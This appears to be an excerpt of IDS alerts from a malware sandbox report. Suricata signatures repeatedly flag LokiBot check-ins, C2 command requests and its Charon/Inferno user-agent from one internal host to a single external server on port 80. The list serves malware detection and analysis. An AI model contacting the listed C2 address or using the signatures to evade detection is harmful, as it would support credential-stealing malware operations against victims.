                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49999 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50042 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50016 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50042 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50092 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50092 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50092 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50021 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50042 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50092 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50077 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50077 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50077 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50057 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50057 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50057 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50077 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50057 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:49993 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50052 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50052 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50052 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:49993 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50054 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50052 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50012 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:49993 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:49993 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50093 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50091 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50093 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50059 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50054 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50093 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50091 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50054 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50091 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50043 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50059 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50043 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50043 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50093 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50091 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50054 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50043 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50095 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50095 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50095 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50095 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50039 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50039 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50039 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50039 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50086 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50086 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50086 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50033 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50072 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50017 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50086 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50017 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50017 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50017 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50105 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50035 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50105 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50035 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50035 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50105 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50071 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50035 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50071 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50105 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50015 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50044 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50071 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50044 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50031 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50044 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50058 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50031 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50031 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50058 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50058 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50071 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50081 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50015 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50081 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50015 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50081 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50015 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50081 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50078 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50058 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50044 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50045 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50078 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50045 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50078 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50031 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50045 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50078 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50045 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50072 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50072 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50072 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50041 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50041 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50041 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50041 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50070 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50070 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50070 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50070 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50089 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50089 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50089 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50089 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50062 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50062 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50062 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50062 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50097 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50097 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50097 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50051 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50051 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50097 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50051 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50051 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50066 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50066 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50066 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50049 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50049 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50066 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50049 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50049 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50099 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50099 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50099 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50099 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50094 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50094 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50094 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50073 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50073 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50073 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50094 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50073 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50088 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50088 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50088 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50034 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50034 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50076 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50034 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50088 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50034 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50076 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50076 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50098 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50098 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50098 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50064 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50064 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50064 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50076 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50098 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50064 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50104 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50104 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50104 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50104 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50100 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50100 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50100 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50100 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50040 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50040 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50040 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.9:50068 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50040 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.9:50068 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.9:50068 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.9:50068 -> 94.156.177.41:80
